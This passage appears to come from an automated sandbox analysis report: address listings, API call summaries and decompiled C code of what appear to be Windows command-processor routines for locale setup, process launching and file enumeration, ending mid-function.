                                  0x001640d2
                                  0x001640e4
                                  0x0016e342
                                  0x0016e34c
                                  0x0016e351
                                  0x0016e353
                                  0x0016e353
                                  0x0016e35b
                                  0x00000000
                                  0x00000000
                                  0x0016e35d
                                  0x0016e364
                                  0x00000000
                                  0x00000000
                                  0x0016e366
                                  0x0016e369
                                  0x0016e36c
                                  0x0016e36f
                                  0x00000000
                                  0x00000000
                                  0x0016e377
                                  0x0016e377
                                  0x0016e37a
                                  0x0016e37c
                                  0x00000000
                                  0x0016e37c
                                  0x0016e375
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0016e375
                                  0x001640ea
                                  0x001640fc
                                  0x0016e384
                                  0x0016e38e
                                  0x0016e393
                                  0x0016e395
                                  0x0016e395
                                  0x0016e39d
                                  0x00000000
                                  0x00000000
                                  0x0016e39f
                                  0x0016e3a6
                                  0x00000000
                                  0x00000000
                                  0x0016e3a8
                                  0x0016e3ab
                                  0x0016e3ae
                                  0x0016e3b1
                                  0x00000000
                                  0x00000000
                                  0x0016e3b9
                                  0x0016e3b9
                                  0x0016e3bc
                                  0x0016e3be
                                  0x00000000
                                  0x0016e3be
                                  0x0016e3b7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0016e3b7
                                  0x00164102
                                  0x00164114
                                  0x0016e3c6
                                  0x0016e3d0
                                  0x0016e3d5
                                  0x0016e3d7
                                  0x0016e3d7
                                  0x0016e3df
                                  0x00000000
                                  0x00000000
                                  0x0016e3e1
                                  0x0016e3e8
                                  0x00000000
                                  0x00000000
                                  0x0016e3ea
                                  0x0016e3ed
                                  0x0016e3f0
                                  0x0016e3f3
                                  0x00000000
                                  0x00000000
                                  0x0016e3fb
                                  0x0016e3fb
                                  0x0016e3fe
                                  0x0016e400
                                  0x00000000
                                  0x0016e400
                                  0x0016e3f9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0016e3f9
                                  0x0016411a
                                  0x0016412c
                                  0x0016e408
                                  0x0016e412
                                  0x0016e417
                                  0x0016e419
                                  0x0016e419
                                  0x0016e421
                                  0x00000000
                                  0x00000000
                                  0x0016e423
                                  0x0016e42a
                                  0x00000000
                                  0x00000000
                                  0x0016e42c
                                  0x0016e42f
                                  0x0016e432
                                  0x0016e435
                                  0x00000000
                                  0x00000000
                                  0x0016e43d
                                  0x0016e43d
                                  0x0016e440
                                  0x0016e442
                                  0x00000000
                                  0x0016e442
                                  0x0016e43b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0016e43b
                                  0x00164132
                                  0x00164144
                                  0x0016e44a
                                  0x0016e454
                                  0x0016e459
                                  0x0016e45b
                                  0x0016e45b
                                  0x0016e463
                                  0x00000000
                                  0x00000000
                                  0x0016e465
                                  0x0016e46c
                                  0x00000000
                                  0x00000000
                                  0x0016e46e
                                  0x0016e471
                                  0x0016e474
                                  0x0016e477
                                  0x00000000
                                  0x00000000
                                  0x0016e47f
                                  0x0016e47f
                                  0x0016e482
                                  0x0016e484
                                  0x00000000
                                  0x0016e484
                                  0x0016e47d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0016e47d
                                  0x0016414a
                                  0x0016415c
                                  0x0016e48c
                                  0x0016e496
                                  0x0016e49b
                                  0x0016e49d
                                  0x0016e49d
                                  0x0016e4a5
                                  0x00000000
                                  0x00000000
                                  0x0016e4a7
                                  0x0016e4ae
                                  0x00000000
                                  0x00000000
                                  0x0016e4b0
                                  0x0016e4b3
                                  0x0016e4b6
                                  0x0016e4b9
                                  0x00000000
                                  0x00000000
                                  0x0016e4c1
                                  0x0016e4c1
                                  0x0016e4c4
                                  0x0016e4c6
                                  0x00000000
                                  0x0016e4c6
                                  0x0016e4bf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0016e4bf
                                  0x00164162
                                  0x00164174
                                  0x0016e4ce
                                  0x0016e4d8
                                  0x0016e4dd
                                  0x0016e4df
                                  0x0016e4df
                                  0x0016e4e7
                                  0x00000000
                                  0x00000000
                                  0x0016e4e9
                                  0x0016e4f0
                                  0x00000000
                                  0x00000000
                                  0x0016e4f2
                                  0x0016e4f5
                                  0x0016e4f8
                                  0x0016e4fb
                                  0x00000000
                                  0x00000000
                                  0x0016e503
                                  0x0016e503
                                  0x0016e506
                                  0x0016e508
                                  0x00000000
                                  0x0016e508
                                  0x0016e501
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0016e501
                                  0x0016417a
                                  0x00164181
                                  0x00164199
                                  0x00164199
                                  0x00163fcf
                                  0x00163fcf
                                  0x00163fd4
                                  0x00163fe0
                                  0x00163fe0
                                  0x00163fe6
                                  0x00000000
                                  0x00000000
                                  0x00163fef
                                  0x0016400a
                                  0x0016400a
                                  0x0016400c
                                  0x0016400c
                                  0x00000000
                                  0x0016400c
                                  0x00163ff1
                                  0x00163ff5
                                  0x00163ff9
                                  0x00000000
                                  0x00000000
                                  0x00163fff
                                  0x00164002
                                  0x00164008
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00164008
                                  0x0016419a
                                  0x0016419c
                                  0x00000000
                                  0x0016419c

                                  APIs
                                    • Part of subcall function 001641A4: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00155BA1,0000001F,?,00000080), ref: 001641A4
                                  • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001E,0017F81C,00000008,00000000,?), ref: 00163FA8
                                  • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 00163FC5
                                  • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 0016402A
                                  • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 0016406C
                                  • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,0017F80C,00000008), ref: 00164094
                                  • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,0017F7A8,00000020), ref: 001640AC
                                  • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,0017F768,00000020), ref: 001640C4
                                  • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,0017F728,00000020), ref: 001640DC
                                  • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,0017F6E8,00000020), ref: 001640F4
                                  • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,0017F6A8,00000020), ref: 0016410C
                                  • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,0017F668,00000020), ref: 00164124
                                  • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,0017F628,00000020), ref: 0016413C
                                  • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,0017F7FC,00000008), ref: 00164154
                                  • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,0017F7E8,00000008), ref: 0016416C
                                  • setlocale.MSVCRT ref: 00164181
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InfoLocale$DefaultUsersetlocale
                                  • String ID: .OCP$1$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                  • API String ID: 1351325837-478706884
                                  • Opcode ID: ed51f7db17b259b3e4038ca7c8aabdc2a2f53dfc61ec357866cb57b206d8e859
                                  • Instruction ID: 7a8ec4899d66d6dca7330e7948947d45e9fabbf26e7a97b54201f09116c14778
                                  • Opcode Fuzzy Hash: ed51f7db17b259b3e4038ca7c8aabdc2a2f53dfc61ec357866cb57b206d8e859
                                  • Instruction Fuzzy Hash: 17D1E47960021296DB248F348D0877632FAFF51740F24826EEA16EB6D4EB71CA6AC351
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0016374E, Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 322threadprocessstringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0016374E(void* __ebx, intOrPtr __ecx, WCHAR* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				void* _t74;
				intOrPtr _t84;
				intOrPtr _t90;
				WCHAR* _t92;
				WCHAR* _t94;
				WCHAR* _t95;
				int _t98;
				long _t99;
				signed int _t101;
				void* _t104;
				struct _SECURITY_ATTRIBUTES* _t109;
				void* _t117;
				WCHAR* _t122;
				WCHAR* _t129;
				WCHAR* _t135;
				void* _t147;
				signed int _t154;
				WCHAR* _t163;
				void* _t165;
				signed int _t167;
				void* _t169;
				WCHAR* _t174;
				struct _SECURITY_ATTRIBUTES* _t177;
				void* _t178;

				E001675CC(__ebx, __edi, __esi);
				 *(_t178 - 0xa8) = __edx;
				 *((intOrPtr*)(_t178 - 0xbc)) = __ecx;
				_t174 =  *(_t178 + 0xc);
				_t135 =  *(_t178 + 0x10);
				_t177 = 0;
				 *(_t178 - 0xac) = 0;
				 *(_t178 - 0xa4) = 0;
				 *((intOrPtr*)(_t178 - 0xb0)) = 0;
				 *((intOrPtr*)(_t178 - 0xb4)) = 0x20;
				_t68 = _t178 - 0xa0;
				__imp__InitializeProcThreadAttributeList(_t68, 1, 0, _t178 - 0xb4, 0x17bdf8, 0x108);
				if(_t68 == 0) {
					 *0x193cf0 = GetLastError();
					E00175011(_t135);
					L21:
					return E00167614(_t135, _t174, _t177);
				}
				 *((intOrPtr*)(_t178 - 0xb8)) = 1;
				_t74 = _t178 - 0xa0;
				__imp__UpdateProcThreadAttribute(_t74, 0, 0x60001, _t178 - 0xb8, 4, 0, 0);
				if(_t74 == 0) {
					 *0x193cf0 = GetLastError();
					E00175011(_t135);
					__imp__DeleteProcThreadAttributeList(_t178 - 0xa0);
					goto L36;
				} else {
					memset(_t178 - 0x118, 0, 0x48);
					 *((intOrPtr*)(_t178 - 0xd4)) = _t178 - 0xa0;
					 *(_t178 - 0x118) = 0x48;
					 *((intOrPtr*)(_t178 - 0x10c)) =  *((intOrPtr*)(_t178 + 0x14));
					 *((intOrPtr*)(_t178 - 0x108)) = 0;
					 *((intOrPtr*)(_t178 - 0x104)) = 1;
					_t84 = 0x64;
					 *((intOrPtr*)(_t178 - 0x100)) = _t84;
					 *((intOrPtr*)(_t178 - 0xfc)) = _t84;
					 *((intOrPtr*)(_t178 - 0xec)) = 0;
					 *(_t178 - 0xe8) = 1;
					memset(_t178 - 0x68, 0, 0x44);
					 *(_t178 - 0x68) = 0x44;
					GetStartupInfoW(_t178 - 0x68);
					 *((intOrPtr*)(_t178 - 0x110)) =  *((intOrPtr*)(_t178 - 0x60));
					 *((intOrPtr*)(_t178 - 4)) = 0;
					if(E00163320(L"COPYCMD") == 0) {
					}
					_t90 = E0015DF40(0x1524ac);
					 *((intOrPtr*)(_t178 - 0xb0)) = _t90;
					if(_t90 == 0) {
						L35:
						_push(0xfffffffe);
						_push(_t178 - 0x10);
						_push(0x17d0b4);
						L001682BB();
						L36:
						goto L21;
					}
					if( *0x193ccc == 0) {
						__eflags =  *0x198058;
						if( *0x198058 != 0) {
							goto L6;
						}
						__eflags =  *0x193cc4;
						if( *0x193cc4 == 0) {
							L8:
							E00164C00();
							_t94 =  *0x193cc4;
							if(_t94 != 0) {
								_t147 = _t94[0x18];
								__eflags = _t147;
								if(_t147 == 0) {
									goto L9;
								}
								_t129 =  *0x193cb8;
								__eflags = _t129;
								if(_t129 == 0) {
									_t129 = 0x193ab0;
								}
								_t98 = CreateProcessAsUserW(_t147, _t135, _t174, _t177, _t177, 1, 0x80000, _t177, _t129, _t178 - 0x118, _t178 - 0xcc);
								L11:
								_t174 = _t98;
								if(_t174 == 0) {
									_t99 = GetLastError();
									 *(_t178 - 0xac) = _t99;
									 *0x193cf0 = _t99;
								} else {
									 *(_t178 - 0xa4) =  *(_t178 - 0xcc);
									CloseHandle( *(_t178 - 0xc8));
								}
								_t150 = L"COPYCMD";
								E00163A50(L"COPYCMD",  *((intOrPtr*)(_t178 - 0xb0)));
								if(_t174 == 0) {
									__eflags =  *0x193cc9;
									if( *0x193cc9 == 0) {
										L48:
										__eflags =  *0x193cf0 - 0x2e4;
										if( *0x193cf0 != 0x2e4) {
											L54:
											__eflags = _t174;
											if(_t174 != 0) {
												goto L14;
											}
											_t177 = E001600B0(0xffce);
											__eflags = _t177;
											if(_t177 != 0) {
												E00161040(_t177, 0x7fe7, _t135);
												E00175011(_t177);
												E00160040(_t177);
											}
											goto L35;
										}
										L49:
										_t122 = E00167797(_t150);
										__eflags = _t122;
										if(_t122 == 0) {
											_t174 = _t177;
										} else {
											_t163 =  *0x193cb8;
											__eflags = _t163;
											if(_t163 == 0) {
												_t163 = 0x193ab0;
											}
											_t174 =  *0x19c01c(_t177, _t135,  *((intOrPtr*)( *((intOrPtr*)(_t178 - 0xbc)) + 0x3c)), _t163,  *(_t178 - 0xe8) & 0x0000ffff, _t178 - 0xa4, 0x193cf0);
										}
										goto L54;
									}
									__eflags =  *0x193cf0 - 0xc1;
									if( *0x193cf0 == 0xc1) {
										goto L49;
									}
									goto L48;
								} else {
									L14:
									_t101 =  *(_t178 - 0xa4);
									_t174 = _t101 & 1;
									_t167 = 2;
									_t154 = _t101 & _t167;
									if(_t101 == 0) {
										L62:
										_t135 = 4;
										L16:
										 *(_t178 - 0xac) = _t177;
										 *0x183838 = 1;
										if(_t135 != 0) {
											L26:
											__eflags = _t135 - 4;
											if(_t135 == 4) {
												_t104 =  *(_t178 - 0xa4);
												__eflags = _t104;
												if(_t104 != 0) {
													CloseHandle(_t104);
													 *(_t178 - 0xa4) = _t177;
												}
											} else {
												__eflags = _t135 - _t167;
												if(_t135 == _t167) {
													 *0x17d54c =  *(_t178 - 0xa4);
												}
											}
											L20:
											 *((intOrPtr*)(_t178 - 4)) = 0xfffffffe;
											E00163A30();
											goto L21;
										}
										_t109 = E00164C3E();
										 *0x18b8b0 = _t109;
										 *(_t178 - 0xa4) = _t177;
										_t177 = _t109;
										 *(_t178 - 0xac) = _t177;
										E0016274C(_t178 - 0x4c, 0x14, L"%08X", _t177);
										E00163A50(L"=ExitCode", _t178 - 0x4c);
										if(_t177 >= 0x20) {
											__eflags = _t177 - 0x7e;
											if(_t177 > 0x7e) {
												goto L18;
											}
											E0016274C(_t178 - 0x80, 0xc, L"%01C", _t177);
											_t169 = _t178 - 0x80;
											L19:
											E00163A50(L"=ExitCodeAscii", _t169);
											if(_t174 != 0) {
												E0017579A(L"=ExitCodeAscii", __eflags);
											}
											goto L20;
										}
										L18:
										_t169 = 0x1524f0;
										goto L19;
									}
									_t135 =  *(_t178 - 0xa8);
									if( *0x193ccc == 0) {
										__eflags =  *0x193cc4;
										if( *0x193cc4 != 0) {
											goto L16;
										}
										__eflags =  *0x193cc9;
										if( *0x193cc9 == 0) {
											goto L16;
										} else {
											__eflags =  *0x198058;
											if( *0x198058 != 0) {
												goto L16;
											}
											__eflags = _t135;
											if(_t135 != 0) {
												goto L16;
											}
											__eflags = _t154;
											if(_t154 != 0) {
												goto L62;
											}
											_t117 = E001752E3(_t101, _t167);
											_t167 = 2;
											__eflags = _t167 - _t117;
											if(_t167 != _t117) {
												goto L16;
											}
											goto L62;
										}
										goto L26;
									}
									goto L16;
								}
							}
							L9:
							_t95 =  *0x193cb8;
							if(_t95 == 0) {
								_t95 = 0x193ab0;
							}
							_t98 = CreateProcessW(_t135, _t174, _t177, _t177, 1, 0x80000, _t177, _t95, _t178 - 0x118, _t178 - 0xcc);
							goto L11;
						}
					}
					L6:
					_t165 = 0x5c;
					_t92 = E00162349(_t135, _t165);
					if(_t92 != 0 && lstrcmpW(_t92, L"\\XCOPY.EXE") == 0) {
						E00174478();
					}
					goto L8;
				}
			}




























                                  0x00163758
                                  0x0016375d
                                  0x00163763
                                  0x00163769
                                  0x0016376c
                                  0x0016376f
                                  0x00163771
                                  0x00163777
                                  0x0016377d
                                  0x00163783
                                  0x00163799
                                  0x001637a0
                                  0x001637a8
                                  0x0016ddec
                                  0x0016ddf3
                                  0x001639e2
                                  0x001639e7
                                  0x001639e7
                                  0x001637b1
                                  0x001637c8
                                  0x001637cf
                                  0x001637d7
                                  0x0016de08
                                  0x0016de0f
                                  0x0016de1b
                                  0x00000000
                                  0x001637dd
                                  0x001637e7
                                  0x001637f5
                                  0x001637fb
                                  0x00163808
                                  0x0016380e
                                  0x00163817
                                  0x0016381f
                                  0x00163820
                                  0x00163826
                                  0x0016382c
                                  0x00163832
                                  0x00163840
                                  0x00163848
                                  0x00163853
                                  0x0016385c
                                  0x00163862
                                  0x00163871
                                  0x00163873
                                  0x0016387a
                                  0x0016387f
                                  0x00163887
                                  0x0016de3e
                                  0x0016de3e
                                  0x0016de43
                                  0x0016de44
                                  0x0016de49
                                  0x0016de51
                                  0x00000000
                                  0x0016de53
                                  0x00163894
                                  0x0016de59
                                  0x0016de60
                                  0x00000000
                                  0x00000000
                                  0x0016de66
                                  0x0016de6d
                                  0x001638bc
                                  0x001638bc
                                  0x001638c1
                                  0x001638c8
                                  0x001639ea
                                  0x001639ed
                                  0x001639ef
                                  0x00000000
                                  0x00000000
                                  0x0016de82
                                  0x0016de87
                                  0x0016de89
                                  0x0016de8b
                                  0x0016de8b
                                  0x0016deae
                                  0x001638fe
                                  0x001638fe
                                  0x00163902
                                  0x0016dec3
                                  0x0016dec9
                                  0x0016decf
                                  0x00163908
                                  0x0016390e
                                  0x0016391a
                                  0x0016391a
                                  0x00163926
                                  0x0016392b
                                  0x00163932
                                  0x0016ded9
                                  0x0016dee0
                                  0x0016deee
                                  0x0016deee
                                  0x0016def8
                                  0x0016df3e
                                  0x0016df3e
                                  0x0016df40
                                  0x00000000
                                  0x00000000
                                  0x0016df50
                                  0x0016df52
                                  0x0016df54
                                  0x0016de2b
                                  0x0016de32
                                  0x0016de39
                                  0x0016de39
                                  0x00000000
                                  0x0016df54
                                  0x0016defa
                                  0x0016defa
                                  0x0016deff
                                  0x0016df01
                                  0x0016df3c
                                  0x0016df03
                                  0x0016df03
                                  0x0016df09
                                  0x0016df0b
                                  0x0016df0d
                                  0x0016df0d
                                  0x0016df38
                                  0x0016df38
                                  0x00000000
                                  0x0016df01
                                  0x0016dee2
                                  0x0016deec
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00163938
                                  0x00163938
                                  0x00163938
                                  0x00163943
                                  0x00163949
                                  0x0016394a
                                  0x0016394e
                                  0x0016df98
                                  0x0016df9a
                                  0x00163967
                                  0x00163967
                                  0x00163970
                                  0x00163977
                                  0x00163a0c
                                  0x00163a0c
                                  0x00163a0f
                                  0x0016dfbc
                                  0x0016dfc2
                                  0x0016dfc4
                                  0x0016dfcb
                                  0x0016dfd1
                                  0x0016dfd1
                                  0x00163a15
                                  0x00163a15
                                  0x00163a17
                                  0x00163a1f
                                  0x00163a1f
                                  0x00163a17
                                  0x001639d4
                                  0x001639d4
                                  0x001639db
                                  0x00000000
                                  0x001639e0
                                  0x00163983
                                  0x00163988
                                  0x0016398d
                                  0x00163993
                                  0x00163995
                                  0x001639a7
                                  0x001639b7
                                  0x001639bf
                                  0x00163a26
                                  0x00163a29
                                  0x00000000
                                  0x00000000
                                  0x0016dfac
                                  0x0016dfb4
                                  0x001639c6
                                  0x001639cb
                                  0x001639d2
                                  0x00163a49
                                  0x00163a49
                                  0x00000000
                                  0x001639d2
                                  0x001639c1
                                  0x001639c1
                                  0x00000000
                                  0x001639c1
                                  0x00163954
                                  0x00163961
                                  0x001639fa
                                  0x00163a01
                                  0x00000000
                                  0x00000000
                                  0x0016df5f
                                  0x0016df66
                                  0x00000000
                                  0x0016df6c
                                  0x0016df6c
                                  0x0016df73
                                  0x00000000
                                  0x00000000
                                  0x0016df79
                                  0x0016df7b
                                  0x00000000
                                  0x00000000
                                  0x0016df81
                                  0x0016df83
                                  0x00000000
                                  0x00000000
                                  0x0016df87
                                  0x0016df8e
                                  0x0016df8f
                                  0x0016df92
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0016df92
                                  0x00000000
                                  0x0016df66
                                  0x00000000
                                  0x00163961
                                  0x00163932
                                  0x001638ce
                                  0x001638ce
                                  0x001638d5
                                  0x0016deb9
                                  0x0016deb9
                                  0x001638f8
                                  0x00000000
                                  0x001638f8
                                  0x0016de73
                                  0x0016389a
                                  0x0016389c
                                  0x0016389f
                                  0x001638a6
                                  0x0016de78
                                  0x0016de78
                                  0x00000000
                                  0x001638a6

                                  APIs
                                  • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,0017BDF8,00000108,0015C897,?,00000000,00000000,00000000), ref: 001637A0
                                  • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 001637CF
                                  • memset.MSVCRT ref: 001637E7
                                  • memset.MSVCRT ref: 00163840
                                  • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 00163853
                                    • Part of subcall function 00163320: _wcsnicmp.MSVCRT ref: 001633A4
                                  • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 001638AE
                                  • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 001638F8
                                  • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 0016391A
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 0016DDE6
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 0016DE02
                                  • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 0016DE1B
                                  • CreateProcessAsUserW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 0016DEAE
                                  • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 0016DFCB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: AttributeProcThread$CloseCreateErrorHandleLastListProcessmemset$DeleteInfoInitializeStartupUpdateUser_wcsnicmplstrcmp
                                  • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                  • API String ID: 1603632292-3461277227
                                  • Opcode ID: e5d95a565b9dda6d6b6e431e0cf9b40edbe99c3427b7d5fcd30a42b1f30537c9
                                  • Instruction ID: 252812a97934da481b1040d3f80da8b03f774afe3833c1b0531a2f240b7554ae
                                  • Opcode Fuzzy Hash: e5d95a565b9dda6d6b6e431e0cf9b40edbe99c3427b7d5fcd30a42b1f30537c9
                                  • Instruction Fuzzy Hash: 59C1A271E003199FDB24DB64DC45BAA77B8EF55704F0040AAF96AE7290DBB08E94CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00166550, Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 535COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E00166550(void* _a4, signed int _a8, void* _a12, signed int* _a16, void* _a20, signed int* _a24, char _a28, long _a32, char _a36, long _a40, short _a42, int _a44, void _a48, int _a564, int _a568, signed int _a572, int _a576, char _a612, void _a648, intOrPtr _a1152, char _a1156, int _a1168, signed int _a1172, char* _a1176, char _a1184, intOrPtr _a1208, void _a1212, signed int _a1220, signed short _a1222, signed int _a1224, signed int _a1226, signed int _a17612) {
				struct _SECURITY_DESCRIPTOR* _v0;
				void* _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t187;
				signed int _t190;
				signed int _t191;
				void* _t192;
				signed int _t195;
				signed int _t201;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				intOrPtr _t216;
				intOrPtr _t217;
				signed int _t219;
				signed int _t221;
				signed int _t223;
				signed int* _t228;
				signed int _t237;
				signed int _t240;
				WCHAR* _t241;
				void* _t242;
				signed int _t243;
				void* _t245;
				signed int _t256;
				void* _t257;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				WCHAR* _t281;
				signed int _t282;
				signed int _t285;
				signed int _t286;
				signed int _t306;
				struct _SECURITY_DESCRIPTOR* _t310;
				signed int _t311;
				void* _t312;
				signed int _t313;
				char* _t314;
				struct _SECURITY_DESCRIPTOR* _t315;
				void* _t316;
				intOrPtr _t317;
				intOrPtr* _t331;
				void* _t337;
				void* _t345;
				void* _t364;
				void* _t371;
				void* _t373;
				intOrPtr _t374;
				intOrPtr _t381;
				char* _t383;
				intOrPtr _t388;
				intOrPtr _t389;
				signed int* _t394;
				void* _t395;
				int _t396;
				void* _t399;
				void* _t400;
				signed int _t401;
				signed int _t402;

				_t402 = _t401 & 0xfffffff8;
				E00168290(0x44d4);
				_t187 =  *0x17d0b4; // 0x3dd0c51d
				_a17612 = _t187 ^ _t402;
				_t371 = _a4;
				_t310 = _a8;
				_t399 = _a12;
				_t394 = _a16;
				_t316 =  &(_t310->Owner);
				_a4 = _t316;
				_t317 =  *((intOrPtr*)(_t316 + 0x1c));
				 *((intOrPtr*)(_t371 + 0x28)) =  *((intOrPtr*)(_t371 + 0x28)) +  *((intOrPtr*)(_t316 + 0x20));
				_a12 = _t371;
				asm("adc [edx+0x2c], ecx");
				_t190 =  *_t394;
				_t372 = _t190;
				_v0 = _t310;
				_a24 = _t394;
				if((_t190 & 0x00000010) != 0) {
					__eflags = _t190;
					if(_t190 < 0) {
						goto L1;
					}
					 *_t394 = _t190 & 0xffffffef;
					_t195 = E001665F0(_t394, _a12, _t399, _t394);
					_t372 =  *_t394 | 0x00000010;
					 *_t394 = _t372;
					__eflags = _t195;
					if(_t195 != 0) {
						L5:
						_pop(_t395);
						_pop(_t400);
						_pop(_t312);
						return E00166FD0(_t195, _t312, _a17612 ^ _t402, _t372, _t395, _t400);
					}
					_t372 = _t372 | 0x80000000;
					 *_t394 = _t372;
				}
				L1:
				if((_t372 & 0x00000040) == 0) {
					__eflags = _t372 & 0x00000004;
					if((_t372 & 0x00000004) == 0) {
						__eflags = _t372 & 0x00000402;
						if(__eflags == 0) {
							_t191 =  *(_t310 + 2) & 0x0000ffff;
							__eflags = _t191;
							if(_t191 == 0) {
								_t192 = 0x2c;
							} else {
								_t192 = 0x2c + _t191 * 2;
							}
							_t311 = E0017A49A(_t399, _t372, _t192 +  &(_t310->Owner), _t317);
							__eflags = _t311;
							if(_t311 == 0) {
								_t373 = 0xe;
								E00177A11(_t399, _t373);
								_t372 = _t394[0x17];
								_t311 = E0017A3E9(_t399, _t394[0x17],  *_t394, _a4);
							}
							__eflags =  *(_t399 + 8);
							if( *(_t399 + 8) == 0) {
								L4:
								_t195 = _t311;
								goto L5;
							}
							_t195 = E0015B610(_t311, _t399, _t394);
							__eflags = _t195;
							if(_t195 != 0) {
								goto L5;
							}
							goto L4;
						}
						_t325 = _t399;
						_t372 = _t394[0x17];
						_t311 = E0017A2C1(_t310, _t399, _t394[0x17], __eflags, _t394[0x17], _a4);
						_t200 = 0;
						_a24 = 0;
						__eflags = _t311;
						if(_t311 != 0) {
							L70:
							__eflags =  *(_t399 + 8) - _t200;
							if( *(_t399 + 8) == _t200) {
								L72:
								__eflags =  *_t394 & 0x00100000;
								if(( *_t394 & 0x00100000) == 0) {
									goto L4;
								}
								_t201 = E00167797(_t325);
								__eflags = _t201;
								if(_t201 == 0) {
									goto L4;
								}
								_a1172 = 1;
								_a1176 = 0x104;
								_a1168 = 0;
								memset( &_a648, 0, 0x104);
								_t402 = _t402 + 0xc;
								__eflags = _a1172;
								_t210 = E00160C70( &_a648, ((0 | _a1172 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
								__eflags = _t210;
								if(_t210 < 0) {
									L91:
									__imp__??_V@YAXPAX@Z(_a1168);
									goto L4;
								}
								_t329 = _a1168;
								__eflags = _a1168;
								if(_a1168 == 0) {
									_t329 =  &_a648;
								}
								_t372 = _a1176;
								_t214 = E001651C9(_t329, _a1176,  *((intOrPtr*)(_a12 + 4)), _a4 + 0x2c);
								__eflags = _t214;
								if(_t214 == 0) {
									_t215 = _a1168;
									__eflags = _t215;
									if(_t215 == 0) {
										_t215 =  &_a648;
									}
									_t372 = 0;
									_t216 =  *0x19c00c(_t215, 0,  &_a48, 0);
									_v16 = _t216;
									__eflags = _t216 - 0xffffffff;
									if(_t216 != 0xffffffff) {
										do {
											_t331 =  &_a40;
											_t372 = _t331 + 2;
											do {
												_t217 =  *_t331;
												_t331 = _t331 + 2;
												__eflags = _t217 - _a16;
											} while (_t217 != _a16);
